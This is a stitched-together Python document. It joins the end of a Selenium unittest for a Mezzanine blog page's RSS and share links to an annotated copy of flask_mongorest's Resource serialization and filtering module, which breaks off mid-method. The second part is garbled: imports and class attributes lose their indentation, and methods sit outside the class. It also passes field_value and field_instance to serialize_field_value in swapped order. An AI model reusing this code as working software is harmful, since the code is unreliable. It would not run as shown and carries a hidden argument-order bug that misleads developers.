    now plain per-instance fixtures (unittest calls them once per test either
    way). Unused locals were removed and `assertEqual(x, True)` replaced with
    `assertTrue(x)`.
    """

    def setUp(self):
        # A fresh browser per test keeps the tests independent.
        # NOTE(review): the hard-coded geckodriver path is machine-specific;
        # consider resolving it from PATH instead.
        self.driver = webdriver.Firefox(executable_path="/home/dibyadarshan/Desktop/Github Repos/mezzanine/test/geckodriver")
        self.driver.get('http://127.0.0.1:8000/blog/test-blog-post/')
        self.driver.maximize_window()

    # @unittest.skip("RSS")
    def testRSS(self):
        """The RSS link on the post page should be clickable."""
        wait = WebDriverWait(self.driver, 10)
        rss_element = wait.until(EC.element_to_be_clickable((By.XPATH, '//*[@id="body"]/div[3]/div/div[3]/div[2]/div/a[1]')))
        rss_element.click()

    @unittest.skip("Twitter")
    def testTwitter(self):
        """'Share on Twitter' should open a twitter.com window."""
        wait = WebDriverWait(self.driver, 10)
        driver = self.driver
        twitter_element = wait.until(EC.element_to_be_clickable((By.LINK_TEXT, 'Share on Twitter')))
        twitter_element.click()
        time.sleep(2)
        driver.switch_to.window(driver.window_handles[1])
        self.assertTrue("twitter" in driver.current_url)

    @unittest.skip("Facebook")
    def testFacebook(self):
        """'Share on Facebook' should open a facebook.com window."""
        wait = WebDriverWait(self.driver, 10)
        driver = self.driver
        facebook_element = wait.until(EC.element_to_be_clickable((By.LINK_TEXT, 'Share on Facebook')))
        facebook_element.click()
        time.sleep(2)
        driver.switch_to.window(driver.window_handles[1])
        self.assertTrue("facebook" in driver.current_url)

    def tearDown(self):
        self.driver.quit()
# Allow running this module directly as a test script.
if __name__ == "__main__":
    unittest.main()
import contextlib
import json
from typing import Dict, List, Type
from urllib.parse import urlparse
import mongoengine
from bson.dbref import DBRef
from bson.objectid import ObjectId
from flask import has_request_context, request, url_for
try: # closeio/mongoengine
from mongoengine.base.proxy import DocumentProxy
from mongoengine.fields import SafeReferenceField
except ImportError:
DocumentProxy = None
SafeReferenceField = None
from cleancat import ValidationError as SchemaValidationError
from mongoengine.fields import (
DictField,
EmbeddedDocumentField,
GenericReferenceField,
ListField,
ReferenceField,
)
from flask_mongorest import methods
from flask_mongorest.exceptions import UnknownFieldError, ValidationError
from flask_mongorest.utils import cmp_fields, equal, isbound, isint
class ResourceMeta(type):
    """Metaclass that resolves lazy (string) entries in `child_document_resources`.

    A resource may map a document class to a sub-resource *by name* before
    that sub-resource class exists. When the class with that name is finally
    created, this metaclass swaps the string for the class object itself.
    """

    def __init__(cls, name, bases, classdict):
        # Only register concrete subclasses: a class that declares
        # `__metaclass__ = ResourceMeta` in its own dict (the base) is skipped.
        if classdict.get("__metaclass__") is not ResourceMeta:
            # Replace any string entry equal to this class's name with the
            # class object now that it exists.
            for document, resource in cls.child_document_resources.items():
                if resource == name:
                    cls.child_document_resources[document] = cls
        type.__init__(cls, name, bases, classdict)
class Resource(metaclass=ResourceMeta):
# MongoEngine Document class related to this resource (required)
document = None
# List of fields that can (and should by default) be included in the
# response
fields = None
# Dict of original field names (as seen in `fields`) and what they should
# be renamed to in the API response
rename_fields: Dict[str, str] = {}
# CleanCat Schema class (used for validation)
schema = None
# List of fields that the objects can be ordered by
allowed_ordering: List[str] = []
# Define whether or not this resource supports pagination
paginate = True
# Default limit if no _limit is specified in the request. Only relevant
# if pagination is enabled.
default_limit = 100
# Maximum value of _limit that can be requested (avoids DDoS'ing the API).
# Only relevant if pagination is enabled.
max_limit = 100
# Maximum number of objects which can be bulk-updated by a single request
bulk_update_limit = 1000
# Map of field names and Resource classes that should be used to handle
# these fields (for serialization, saving, etc.).
related_resources: Dict[str, "Resource"] = {}
# Map of field names on this resource's document to field names on the
# related resource's document, used as a helper in the process of
# turning a field value from a queryset to a list of objects
#
# TODO Behavior of this is *very* unintuitive and should be changed or
# dropped, or at least refactored
related_resources_hints: Dict[str, str] = {}
# List of field names corresponding to related resources. If a field is
# mentioned here and in `related_resources`, it can be created/updated
# from within this resource.
save_related_fields: List[str] = []
# Map of MongoEngine Document classes to Resource class names. Defines
# which sub-resource should be used for handling a particular subclass of
# this resource's document.
child_document_resources: Dict[Type, str] = {}
# Whenever a new document is posted and the system doesn't know the type
# of it yet, it will choose a default sub-resource for this document type
default_child_resource_document = None
# Defines whether MongoEngine's select_related should be used on a
# filtered query set, pulling all the references efficiently.
select_related = False
# Must start and end with a "/"
uri_prefix = None
def __init__(self, view_method=None):
    """
    Initialize a resource. Optionally, a method class can be given to
    view_method (see methods.py) so the resource can behave differently
    depending on the method.
    """
    doc_fields = self.document._fields.keys()
    # If no explicit field list was declared, expose every field of the
    # underlying MongoEngine document.
    if self.fields is None:
        self.fields = doc_fields
    self._related_resources = self.get_related_resources()
    self._rename_fields = self.get_rename_fields()
    # Build the inverse rename map (API-facing name -> document field
    # name) so incoming params/payloads can be translated back.
    self._reverse_rename_fields = {}
    for k, v in self._rename_fields.items():
        self._reverse_rename_fields[v] = k
    # If two fields were renamed to the same target name, the inverse
    # map would shrink and renames would become ambiguous.
    assert len(self._rename_fields) == len(
        self._reverse_rename_fields
    ), "Cannot rename multiple fields to the same name"
    self._filters = self.get_filters()
    self._child_document_resources = self.get_child_document_resources()
    self._default_child_resource_document = (
        self.get_default_child_resource_document()
    )
    # Validated request payload (filled in by validate_request).
    self.data = None
    # Names of fields changed by the last create/update; consumed by
    # save_related_objects / save_object.
    self._dirty_fields = None
    self.view_method = view_method
@property
def params(self):
    """
    Return parameters of the request which is currently being processed.
    Params can be passed in two different ways:
    1. As a querystring (e.g. '/resource/?status=active&_limit=10').
    2. As a _params property in the JSON payload. For example:
       { '_params': { 'status': 'active', '_limit': '10' } }

    Raises AttributeError outside of a request context.
    """
    if not has_request_context():
        # `params` doesn't make sense if we don't have a request
        raise AttributeError
    # Parse lazily and cache the result on the instance.
    if not hasattr(self, "_params"):
        # A `_params` key in the JSON body takes precedence over the
        # querystring.
        if "_params" in self.raw_data:
            self._params = self.raw_data["_params"]
        else:
            try:
                self._params = request.args.to_dict()
            except AttributeError:  # mocked request with regular dict
                self._params = request.args
    return self._params
def _enforce_strict_json(self, val):
"""
Enforce strict json parsing.
Raise a ValueError if NaN, Infinity, or -Infinity were posted. By
default, json.loads accepts these values, but it allows us to perform
extra validation via a parse_constant kwarg.
"""
# according to the `json.loads` docs: "parse_constant, if specified,
# will be called with one of the following strings: '-Infinity',
# 'Infinity', 'NaN'". Since none of them are valid JSON, we can simply
# raise an exception here.
raise ValueError
@property
def raw_data(self):
    """Validate and return parsed JSON payload.

    Raises ValidationError when the Content-Type isn't JSON, when
    chunked Transfer-Encoding is used, when the body isn't valid strict
    JSON, or when the decoded payload isn't a dict. The parsed payload
    is cached on the instance; non-PUT/POST requests without a body
    yield an empty dict.
    """
    if not has_request_context():
        # `raw_data` doesn't make sense if we don't have a request
        raise AttributeError
    if not hasattr(self, "_raw_data"):
        # Parse the body for PUT/POST, or for any request that sent data.
        if request.method in ("PUT", "POST") or request.data:
            if request.mimetype and "json" not in request.mimetype:
                raise ValidationError(
                    {
                        "error": "Please send valid JSON with a 'Content-Type: application/json' header."
                    }
                )
            if request.headers.get("Transfer-Encoding") == "chunked":
                raise ValidationError(
                    {"error": "Chunked Transfer-Encoding is not supported."}
                )
            try:
                # parse_constant rejects NaN/Infinity/-Infinity, which
                # json.loads would otherwise happily accept.
                self._raw_data = json.loads(
                    request.data.decode("utf-8"),
                    parse_constant=self._enforce_strict_json,
                )
            except ValueError:
                raise ValidationError(
                    {"error": "The request contains invalid JSON."}
                )
            if not isinstance(self._raw_data, dict):
                raise ValidationError({"error": "JSON data must be a dict."})
        else:
            self._raw_data = {}
    return self._raw_data
@classmethod
def uri(cls, path):
    """Generate a URI reference for the given path.

    Raises ValueError when the resource declares no uri_prefix.
    """
    if not cls.uri_prefix:
        raise ValueError(
            "Cannot generate URI for resources that do not specify a uri_prefix"
        )
    return cls.uri_prefix + path
@classmethod
def _url(cls, path):
    """Generate a complete URL for the given path. Requires application context.

    Raises ValueError when the resource declares no uri_prefix.
    """
    if not cls.uri_prefix:
        raise ValueError(
            "Cannot generate URL for resources that do not specify a uri_prefix"
        )
    # The endpoint is named after the prefix without its surrounding
    # slashes; resolve it to an absolute URL and append the path.
    base = url_for(cls.uri_prefix.strip("/"), _external=True)
    return base + path
def get_fields(self):
    """Return the fields serialized in responses by default (unless a
    `_fields` param excludes them)."""
    return self.fields
def get_optional_fields(self):
    """Return fields that are serialized only when a `_fields` param
    mentions them explicitly. None by default."""
    return []
def get_requested_fields(self, **kwargs):
    """
    Process a list of fields requested by the client and return only the
    ones which are allowed by get_fields and get_optional_fields.

    If the `_fields` param is set to '_all', return every field from
    get_fields and get_optional_fields combined. An explicit `fields`
    kwarg overrides the resource's own field declarations.
    """
    params = kwargs.get("params", None)

    # Determine the universe of serializable fields.
    if "fields" in kwargs:
        fields = kwargs["fields"]
        all_fields_set = set(fields)
    else:
        fields = self.get_fields()
        all_fields_set = set(fields) | set(self.get_optional_fields())

    # Parse the client's `_fields` selection, if any.
    only_fields = None
    include_all = False
    if params and "_fields" in params:
        only_fields = set(params["_fields"].split(","))
        include_all = "_all" in only_fields

    if only_fields is None or include_all:
        # No selection at all, or "_all": serialize the default set or
        # the full set respectively.
        source = all_fields_set if include_all else fields
        return [field for field in source]

    # Translate API-facing names back to document field names, dropping
    # anything that isn't a known field.
    return [
        self._reverse_rename_fields.get(field, field)
        for field in only_fields
        if self._reverse_rename_fields.get(field, field) in all_fields_set
    ]
def get_max_limit(self):
    """Return the maximum value a client may request via `_limit`."""
    return self.max_limit
def get_related_resources(self):
    """Return the map of field names to the Resource classes handling
    them."""
    return self.related_resources
def get_save_related_fields(self):
    """Return the related field names that may be created/updated from
    within this resource."""
    return self.save_related_fields
def get_rename_fields(self):
    """Return the map of document field names to their API-facing names.

    @TODO should automatically support model_id for reference fields (only) and model for related_resources
    """
    return self.rename_fields
def get_child_document_resources(self):
    """Return the sub-resource map declared directly on this class.

    child_document_resources is deliberately *not* inherited: this lets
    multiple resources exist for a child document without each subclass
    having to reset the attribute.
    """
    own_attrs = vars(self.__class__)
    if "child_document_resources" in own_attrs:
        return self.child_document_resources
    return {}
def get_default_child_resource_document(self):
    """Return the default child resource document declared directly on
    this class (not inherited; see get_child_document_resources)."""
    own_attrs = vars(self.__class__)
    if "default_child_resource_document" in own_attrs:
        return self.default_child_resource_document
    return None
def get_filters(self):
    """
    Given the filters declared on this resource, return a mapping
    of all allowed filters along with their individual mappings of
    suffixes and operators.

    For example, if self.filters declares:
        { 'date': [operators.Exact, operators.Gte] }
    then this method will return:
        {
            'date': {
                '': operators.Exact,
                'exact': operators.Exact,
                'gte': operators.Gte
            }
        }
    Then, when a request comes in, Flask-MongoRest will match
    `?date__gte=value` to the 'date' field and the 'gte' suffix: 'gte',
    and hence use the Gte operator to filter the data.
    """
    result = {}
    for field_name, ops in getattr(self, "filters", {}).items():
        suffix_map = {}
        for operator_cls in ops:
            # The "exact" operator doubles as the no-suffix default
            # (plain `?field=value`).
            if operator_cls.op == "exact":
                suffix_map[""] = operator_cls
            suffix_map[operator_cls.op] = operator_cls
        result[field_name] = suffix_map
    return result
def serialize_field(self, obj, **kwargs):
    """Serialize `obj` as a URL reference (when this resource declares a
    uri_prefix and the object has an id) or as a full document."""
    if self.uri_prefix and hasattr(obj, "id"):
        return self._url(str(obj.id))
    return self.serialize(obj, **kwargs)
def _subresource(self, obj):
"""
Select and create an appropriate sub-resource class for delegation or
return None if there isn't one.
"""
s_class = self._child_document_resources.get(obj.__class__)
if not s_class and self._default_child_resource_document:
s_class = self._child_document_resources[
self._default_child_resource_document
]
if s_class and s_class != self.__class__:
r = s_class(view_method=self.view_method)
r.data = self.data
return r
else:
return None
def get_field_value(self, obj, field_name, field_instance=None, **kwargs):
    """Return a json-serializable field value.

    field_name is the name of the field in `obj` to be serialized.
    field_instance is a MongoEngine field definition.
    **kwargs are just any options to be passed through to child resources serializers.

    Raises UnknownFieldError if `obj` has no attribute `field_name`.
    """
    has_field_instance = bool(field_instance)
    # Resolve the field definition: explicit argument first, then the
    # document's declared fields, then a plain class attribute.
    field_instance = (
        field_instance
        or self.document._fields.get(field_name, None)
        or getattr(self.document, field_name, None)
    )
    # Determine the field value
    if has_field_instance:
        # Caller passed an explicit definition, which means `obj` is
        # already the raw value (e.g. a list/dict element), not the
        # document itself.
        field_value = obj
    elif isinstance(obj, dict):
        return obj[field_name]
    else:
        try:
            field_value = getattr(obj, field_name)
        except AttributeError:
            raise UnknownFieldError
    return self.serialize_field_value(
        obj, field_name, field_instance, field_value, **kwargs
    )
def serialize_field_value(
    self, obj, field_name, field_value, field_instance=None, **kwargs
):
    """Select and delegate to an appropriate serializer method based on type of field instance.

    field_value is an actual value to be serialized.
    For other fields, see get_field_value method.
    """
    # Reference/embedded documents may be delegated to a related resource.
    if isinstance(
        field_instance,
        (ReferenceField, GenericReferenceField, EmbeddedDocumentField),
    ):
        return self.serialize_document_field(field_name, field_value, **kwargs)
    elif isinstance(field_instance, ListField):
        return self.serialize_list_field(
            field_instance, field_name, field_value, **kwargs
        )
    elif isinstance(field_instance, DictField):
        return self.serialize_dict_field(
            field_instance, field_name, field_value, **kwargs
        )
    elif callable(field_instance):
        # Computed field: execute the callable to obtain the value.
        return self.serialize_callable_field(
            obj, field_instance, field_name, field_value, **kwargs
        )
    # Plain scalar field: assumed to be json-serializable as-is.
    return field_value
def serialize_callable_field(
    self, obj, field_instance, field_name, field_value, **kwargs
):
    """Execute a callable field and return it or serialize
    it based on its related resource defined in the `related_resources` map.
    """
    # Lists are taken as-is; otherwise call whichever of the definition
    # or the value is bound, falling back to calling the definition with
    # the document as its argument.
    if isinstance(field_value, list):
        value = field_value
    else:
        if isbound(field_instance):
            value = field_instance()
        elif isbound(field_value):
            value = field_value()
        else:
            value = field_instance(obj)
    # If a related resource is registered for this field, serialize the
    # computed value (or each element of it) through that resource.
    if field_name in self._related_resources:
        if isinstance(value, list):
            return [
                self._related_resources[field_name]().serialize_field(o, **kwargs)
                for o in value
            ]
        elif value is None:
            return None
        else:
            return self._related_resources[field_name]().serialize_field(
                value, **kwargs
            )
    return value
def serialize_dict_field(self, field_instance, field_name, field_value, **kwargs):
    """Serialize a DictField's value.

    When the DictField declares a value type (e.g. DictField(IntField)),
    every value is serialized with that type; otherwise the dict is
    returned unchanged.
    """
    value_field = field_instance.field
    if not value_field:
        # No explicit value type was declared; pass the dict through.
        return field_value
    serialized = {}
    for key, elem in field_value.items():
        serialized[key] = self.get_field_value(
            elem, field_name, field_instance=value_field, **kwargs
        )
    return serialized
def serialize_list_field(self, field_instance, field_name, field_value, **kwargs):
    """Serialize each item in the list separately.

    Falsy serialized items (None, 0, '', ...) are dropped from the
    result, mirroring the original behavior of this method.
    """
    serialized = []
    for elem in field_value:
        item = self.get_field_value(
            elem, field_name, field_instance=field_instance.field, **kwargs
        )
        if item:
            serialized.append(item)
    return serialized
def serialize_document_field(self, field_name, field_value, **kwargs):
    """If this field is a reference or an embedded document, either return
    a DBRef or serialize it using a resource found in `related_resources`.
    """
    if field_name in self._related_resources:
        # NOTE(review): because of the short-circuiting `and` chain, a
        # falsy field_value is returned as-is and a DBRef value yields
        # False rather than being serialized -- confirm this is the
        # intended contract for callers.
        return (
            field_value
            and not isinstance(field_value, DBRef)
            and self._related_resources[field_name]().serialize_field(
                field_value, **kwargs
            )
        )
    else:
        if DocumentProxy and isinstance(field_value, DocumentProxy):
            # Don't perform a DBRef isinstance check below since
            # it might trigger an extra query.
            return field_value.to_dbref()
        if isinstance(field_value, DBRef):
            return field_value
        # Plain document (or falsy value): represent it as a DBRef.
        return field_value and field_value.to_dbref()
def serialize(self, obj, **kwargs):
    """
    Given an object, serialize it, turning it into its JSON
    representation.

    Honors the requested/optional field selection (see
    get_requested_fields), the field rename map, callable fields defined
    on the resource, and the `related_resources` map. Falsy objects
    serialize to an empty dict.
    """
    if not obj:
        return {}
    # If a subclass of an obj has been called with a base class' resource,
    # use the subclass-specific serialization
    subresource = self._subresource(obj)
    if subresource:
        return subresource.serialize(obj, **kwargs)
    # Get the requested fields
    requested_fields = self.get_requested_fields(**kwargs)
    # Drop the kwargs we don't need any more (we're passing `kwargs` to
    # child resources so we don't want to pass `fields` and `params` that
    # pertain to the parent resource).
    kwargs.pop("fields", None)
    kwargs.pop("params", None)
    # Fill in the `data` dict by serializing each of the requested fields
    # one by one.
    data = {}
    for field in requested_fields:
        # resolve the user-facing name of the field
        renamed_field = self._rename_fields.get(field, field)
        # if the field is callable, execute it with `obj` as the param
        if hasattr(self, field) and callable(getattr(self, field)):
            value = getattr(self, field)(obj)
            # if the field is associated with a specific resource (via the
            # `related_resources` map), use that resource to serialize it
            if field in self._related_resources and value is not None:
                related_resource = self._related_resources[field]()
                if isinstance(value, mongoengine.document.Document):
                    value = related_resource.serialize_field(value)
                elif isinstance(value, dict):
                    value = {
                        k: related_resource.serialize_field(v)
                        for (k, v) in value.items()
                    }
                else:  # assume queryset or list
                    value = [related_resource.serialize_field(o) for o in value]
            data[renamed_field] = value
        else:
            try:
                data[renamed_field] = self.get_field_value(obj, field, **kwargs)
            except UnknownFieldError:
                # Field unknown to the document: fall back to the
                # resource-level hook, silently skipping the field when
                # that fails too.
                with contextlib.suppress(UnknownFieldError):
                    data[renamed_field] = self.value_for_field(obj, field)
    return data
def handle_serialization_error(self, exc, obj):
    """Hook invoked when serializing `obj` raised `exc`.

    The default implementation does nothing; subclasses may override it
    to log, repair, or re-raise.
    """
def value_for_field(self, obj, field):
    """Hook for resolving fields that exist neither on the resource nor
    on the object.

    The default implementation knows no extra fields and therefore
    always raises UnknownFieldError; subclasses may override it to
    return custom values.
    """
    raise UnknownFieldError
def validate_request(self, obj=None):
    """
    Validate the request that's currently being processed and fill in
    the self.data dict that'll later be used to save/update an object.

    `obj` points to the object that's being updated, or is empty if a new
    object is being created.

    Raises ValidationError when the CleanCat schema (if any) rejects the
    payload.
    """
    # When creating or updating a single object, delegate the validation
    # to a more specific subresource, if it exists
    if (request.method == "PUT" and obj) or request.method == "POST":
        subresource = self._subresource(obj)
        if subresource:
            subresource._raw_data = self._raw_data
            subresource.validate_request(obj=obj)
            self.data = subresource.data
            return
    # Don't work on original raw data, we may reuse the resource for bulk
    # updates.
    self.data = self.raw_data.copy()
    # Do renaming in two passes to prevent potential multiple renames
    # depending on dict traversal order.
    # E.g. if a -> b, b -> c, then a should never be renamed to c.
    fields_to_delete = []
    fields_to_update = {}
    for k, v in self._rename_fields.items():
        if v in self.data:
            fields_to_update[k] = self.data[v]
            fields_to_delete.append(v)
    for k in fields_to_delete:
        del self.data[k]
    for k, v in fields_to_update.items():
        self.data[k] = v
    # If CleanCat schema exists on this resource, use it to perform the
    # validation
    if self.schema:
        if request.method == "PUT" and obj is not None:
            # Provide the existing object's data so the schema can
            # validate a partial update against current values.
            obj_data = {key: getattr(obj, key) for key in obj._fields.keys()}
        else:
            obj_data = None
        schema = self.schema(self.data, obj_data)
        try:
            self.data = schema.full_clean()
        except SchemaValidationError:
            raise ValidationError(
                {"field-errors": schema.field_errors, "errors": schema.errors}
            )
def get_queryset(self):
    """Return the base MongoEngine queryset used to fetch this
    resource's documents."""
    return self.document.objects
def get_object(self, pk, qfilter=None):
    """
    Given a PK and an optional queryset filter function, find a matching
    document in the queryset.

    Propagates whatever the queryset's get() raises when no document
    matches `pk`.
    """
    qs = self.get_queryset()
    # If a queryset filter was provided, pass our current queryset in and
    # get a new one out
    if qfilter:
        qs = qfilter(qs)
    obj = qs.get(pk=pk)
    # We don't need to fetch related resources for DELETE requests because
    # those requests do not serialize the object (a successful DELETE
    # simply returns a `{}`, at least by default). We still want to fetch
    # related resources for GET and PUT.
    if request.method != "DELETE":
        self.fetch_related_resources(
            [obj], self.get_requested_fields(params=self.params)
        )
    return obj
def fetch_related_resources(self, objs, only_fields=None):
    """
    Given a list of objects and an optional list of the only fields we
    should care about, fetch these objects' related resources.

    Queries targeting the same related collection are OR-ed together and
    executed once; the results are then mapped back onto each object
    (driven by related_resources_hints) via setattr.
    """
    from functools import cmp_to_key

    if not self.related_resources_hints:
        return
    # Create a map of field names to MongoEngine Q objects that will
    # later be used to fetch the related resources from MongoDB
    # Queries for the same document/collection are combined to improve
    # efficiency.
    document_queryset = {}
    for obj in objs:
        for field_name in self.related_resources_hints.keys():
            if only_fields is not None and field_name not in only_fields:
                continue
            # Each hinted field is expected to be a method returning a
            # queryset whose _query_obj carries the Q object to merge.
            method = getattr(obj, field_name)
            if callable(method):
                q = method()
                if field_name in document_queryset:
                    document_queryset[field_name] = (
                        document_queryset[field_name] | q._query_obj
                    )
                else:
                    document_queryset[field_name] = q._query_obj
    # For each field name, execute the queries we generated in the block
    # above, and map the results to each object that references them.
    # TODO This is in dire need of refactoring, or a complete overhaul
    hints = {}
    for field_name, q_obj in document_queryset.items():
        doc = self.get_related_resources()[field_name].document
        # Create a QuerySet based on the query object
        query = doc.objects.filter(q_obj)
        # Don't let MongoDB do the sorting as it won't use the index.
        # Store the ordering so we can do client sorting afterwards.
        ordering = query._ordering or query._get_order_by(
            query._document._meta["ordering"]
        )
        query = query.order_by()
        # Fetch the results
        results = list(query)
        # Reapply the ordering and add results to the mapping.
        # BUG FIX: Python 3's sorted() accepts no positional comparator
        # (this used to raise TypeError whenever an ordering applied);
        # wrap the cmp-style function returned by cmp_fields with
        # functools.cmp_to_key instead.
        if ordering:
            document_queryset[field_name] = sorted(
                results, key=cmp_to_key(cmp_fields(ordering))
            )
        else:
            document_queryset[field_name] = results
        # For each field name, create a map of obj PKs to a list of
        # results they referenced.
        hint_index = {}
        if field_name in self.related_resources_hints:
            hint_field = self.related_resources_hints[field_name]
            for obj in document_queryset[field_name]:
                hint_field_instance = obj._fields[hint_field]
                # Don't trigger a query for SafeReferenceFields
                if SafeReferenceField and isinstance(
                    hint_field_instance, SafeReferenceField
                ):
                    hinted = obj._db_data[hint_field]
                    if hint_field_instance.dbref:
                        hinted = hinted.id
                else:
                    hinted = str(getattr(obj, hint_field).id)
                if hinted not in hint_index:
                    hint_index[hinted] = [obj]
                else:
                    hint_index[hinted].append(obj)
            hints[field_name] = hint_index
    # Assign the results to each object
    # TODO This is in dire need of refactoring, or a complete overhaul
    for obj in objs:
        for field_name, hint_index in hints.items():
            # Normalize the object's id so it can be matched against the
            # (string/raw) keys built above.
            obj_id = obj.id
            if isinstance(obj_id, DBRef):
                obj_id = obj_id.id
            elif isinstance(obj_id, ObjectId):
                obj_id = str(obj_id)
            if obj_id not in hint_index:
                setattr(obj, field_name, [])
            else:
                setattr(obj, field_name, hint_index[obj_id])
def apply_filters(self, qs, params=None):
    """
    Given this resource's filters, and the params of the request that's
    currently being processed, apply additional filtering to the queryset
    and return it.

    Param keys look like `field=value`, `field__op=value`,
    `field__not__op=value`, or `field__lookup__op=value`. Unknown fields
    and disallowed operators/negations are silently ignored.
    """
    if params is None:
        params = self.params
    for key, value in params.items():
        # If this is a resource identified by a URI, we need
        # to extract the object id at this point since
        # MongoEngine only understands the object id
        if self.uri_prefix:
            path = urlparse(value).path
            # BUG FIX: str.lstrip() strips a *character set*, not a
            # prefix, which mangled ids beginning with any character of
            # the prefix. Remove the literal prefix instead.
            if path.startswith(self.uri_prefix):
                value = path[len(self.uri_prefix):]
            else:
                value = path
        # special handling of empty / null params
        # http://werkzeug.pocoo.org/docs/0.9/utils/ url_decode returns '' for empty params
        if value == "":
            value = None
        elif value in ['""', "''"]:
            value = ""
        negate = False
        op_name = ""
        # Find the longest field prefix of the key that has declared
        # filters; whatever is left over is lookups and/or an operator.
        parts = key.split("__")
        for i in range(len(parts) + 1, 0, -1):
            field = "__".join(parts[:i])
            allowed_operators = self._filters.get(field)
            if allowed_operators:
                parts = parts[i:]
                break
        if allowed_operators is None:
            continue
        if parts:
            # either an operator or a query lookup! See what's allowed.
            op_name = parts[-1]
            if op_name in allowed_operators:
                # operator; drop it
                parts.pop()
            else:
                # assume it's part of a lookup
                op_name = ""
        # A trailing `not` negates the operator (e.g. field__not__in).
        if parts and parts[-1] == "not":
            negate = True
            parts.pop()
        operator = allowed_operators.get(op_name, None)
        if operator is None:
            continue
        if negate and not operator.allow_negation:
            continue
        # Re-attach any remaining lookup parts and translate the
        # API-facing name back to the document field name.
        if parts:
            field = f"{field}__{'__'.join(parts)}"
        field = self._reverse_rename_fields.get(field, field)
        qs = operator().apply(qs, field, value, negate)
    return qs
def apply_ordering(self, qs, params=None):
    """
    Given this resource's allowed_ordering, and the params of the request
    that's currently being processed, apply ordering to the queryset
    and return it.
    """
    if params is None:
        params = self.params
    requested = params.get("_order_by")
    # Only orderings explicitly whitelisted on the resource are honored.
    if not (self.allowed_ordering and requested in self.allowed_ordering):
        return qs
    order_params = [
        self._reverse_rename_fields.get(p, p) for p in requested.split(",")
    ]
    return qs.order_by(*order_params)
def get_skip_and_limit(self, params=None):
    """
    Perform validation and return sanitized values for the _skip and
    _limit params of the request that's currently being processed.

    Raises ValidationError for non-integer values, a limit above
    get_max_limit(), or a negative skip.
    """
    max_limit = self.get_max_limit()
    if params is None:
        params = self.params
    if not self.paginate:
        # Pagination disabled: start at the beginning, cap at the max.
        return 0, max_limit
    # _limit and _skip validation
    if not isint(params.get("_limit", 1)):
        raise ValidationError(
            {
                "error": '_limit must be an integer (got "{}" instead).'.format(
                    params["_limit"]
                )
            }
        )
    if not isint(params.get("_skip", 1)):
        raise ValidationError(
            {
                "error": '_skip must be an integer (got "{}" instead).'.format(
                    params["_skip"]
                )
            }
        )
    if params.get("_limit") and int(params["_limit"]) > max_limit:
        raise ValidationError(
            {
                "error": f"The limit you set is larger than the maximum limit for this resource (max_limit = {max_limit})."
            }
        )
    if params.get("_skip") and int(params["_skip"]) < 0:
        raise ValidationError(
            {
                "error": '_skip must be a non-negative integer (got "{}" instead).'.format(
                    params["_skip"]
                )
            }
        )
    limit = min(int(params.get("_limit", self.default_limit)), max_limit)
    return int(params.get("_skip", 0)), limit
def get_objects(self, qs=None, qfilter=None):
    """
    Return objects fetched from the database based on all the parameters
    of the request that's currently being processed.

    Params:
    - Custom queryset can be passed via `qs`. Otherwise `self.get_queryset`
      is used.
    - Pass `qfilter` function to modify the queryset.

    Returns an (objects, has_more) tuple; has_more is None when
    pagination does not apply.
    """
    params = self.params
    custom_qs = True
    if qs is None:
        custom_qs = False
        qs = self.get_queryset()
    # If a queryset filter was provided, pass our current queryset in and
    # get a new one out
    if qfilter:
        qs = qfilter(qs)
    # Apply filters and ordering, based on the params supplied by the
    # request
    qs = self.apply_filters(qs, params)
    qs = self.apply_ordering(qs, params)
    # Apply limit and skip to the queryset
    limit = None
    if self.view_method == methods.BulkUpdate:
        # limit the number of objects that can be bulk-updated at a time
        qs = qs.limit(self.bulk_update_limit)
    elif not custom_qs:
        # no need to skip/limit if a custom `qs` was provided
        # Fetch one extra object beyond the limit so we can tell whether
        # more results exist (see has_more below).
        skip, limit = self.get_skip_and_limit(params)
        qs = qs.skip(skip).limit(limit + 1)
    # Needs to be at the end as it returns a list, not a queryset
    if self.select_related:
        qs = qs.select_related()
    # Evaluate the queryset
    objs = list(qs)
    # Raise a validation error if bulk update would result in more than
    # bulk_update_limit updates
    if (
        self.view_method == methods.BulkUpdate
        and len(objs) >= self.bulk_update_limit
    ):
        raise ValidationError(
            {
                "errors": [
                    f"It's not allowed to update more than {self.bulk_update_limit} objects at once"
                ]
            }
        )
    # Determine the value of has_more
    if self.view_method != methods.BulkUpdate and self.paginate:
        # NOTE(review): when a custom `qs` is passed and pagination is
        # enabled, `limit` is still None here, so `len(objs) > limit`
        # raises TypeError on Python 3 -- confirm whether that
        # combination can occur in practice.
        has_more = len(objs) > limit
        if has_more:
            objs = objs[:-1]
    else:
        has_more = None
    # bulk-fetch related resources for moar speed
    self.fetch_related_resources(objs, self.get_requested_fields(params=params))
    return objs, has_more
def save_related_objects(self, obj, parent_resources=None):
    """Save dirty related objects referenced by `obj`.

    Only fields present in both self._dirty_fields and
    get_save_related_fields() are considered. Reference fields and lists
    of references are saved through their related resource when one is
    declared, or directly via .save() otherwise.
    """
    if not parent_resources:
        parent_resources = [self]
    else:
        # NOTE(review): `+=` mutates the caller's list in place, so
        # sibling calls sharing this list will see each other's entries
        # -- confirm this is intended.
        parent_resources += [self]
    if self._dirty_fields:
        for field_name in set(self._dirty_fields) & set(
            self.get_save_related_fields()
        ):
            try:
                related_resource = self.get_related_resources()[field_name]
            except KeyError:
                related_resource = None
            field_instance = getattr(self.document, field_name)
            # If it's a ReferenceField, just save it.
            if isinstance(field_instance, ReferenceField):
                instance = getattr(obj, field_name)
                if instance:
                    if related_resource:
                        related_resource().save_object(
                            instance, parent_resources=parent_resources
                        )
                    else:
                        instance.save()
            # If it's a ListField(ReferenceField), save all instances.
            if isinstance(field_instance, ListField) and isinstance(
                field_instance.field, ReferenceField
            ):
                instance_list = getattr(obj, field_name)
                for instance in instance_list:
                    if related_resource:
                        related_resource().save_object(
                            instance, parent_resources=parent_resources
                        )
                    else:
                        instance.save()
def save_object(self, obj, **kwargs):
    """Persist `obj` (and any dirty related objects first), then refresh
    it from the database."""
    self.save_related_objects(obj, **kwargs)
    obj.save()
    obj.reload()
    # Everything has been persisted; nothing is dirty any more.
    self._dirty_fields = None
def get_object_dict(self, data=None, update=False):
    """Return field/value pairs (from self.data, falling back to `data`)
    restricted to fields declared on the document.

    With update=True the result is additionally restricted to fields
    that actually appear in the request payload, so an update never
    touches untouched document fields.
    """
    payload = self.data or data or {}
    allowed = set(self.document._fields.keys())
    if update:
        # We want to update only the fields that appear in the request
        # data rather than re-updating all the document's existing/other
        # fields.
        requested = {
            self._reverse_rename_fields.get(field, field)
            for field in self.raw_data.keys()
        }
        allowed &= requested
